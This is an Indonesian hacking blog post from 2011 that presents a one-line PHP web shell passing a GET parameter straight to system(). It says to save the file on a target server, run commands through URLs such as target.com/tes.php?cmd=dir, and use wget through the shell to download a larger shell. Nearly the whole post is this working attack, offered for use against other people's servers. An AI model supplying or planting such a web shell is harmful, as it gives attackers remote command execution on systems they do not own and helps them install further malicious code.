News Update :
Home » » Simple Shell Command

Simple Shell Command

Penulis : Unknown on 23 Sept 2011 | 14:05

Ikut2an om DNZ nih bikin artikel tentang simple shell.

tapi kali ini simple shell command, biasa dipakai di server linux
Berikut code Simple Shell Command
  1. <?php
  2. echo '<pre>';system($_GET['cmd']);echo '</pre>';
  3. ?>
simpan misal dengan nama tes.php
lalu panggil dengan cara:
http://target.com/tes.php?cmd=dir
dir = command untuk melihat isi directory

kalau mau upload shell tinggal pakai perintah wget lokasi shell.
http://target.com/tes.php?cmd=wget http://target.com/shell.php
dah ya semoga bermanfaat

salam
anharku

Share this article :

Tinggalkan Pesan Anda

Comment With FB

 
Design Template by panjz-online | Support by creating website | Powered by Blogger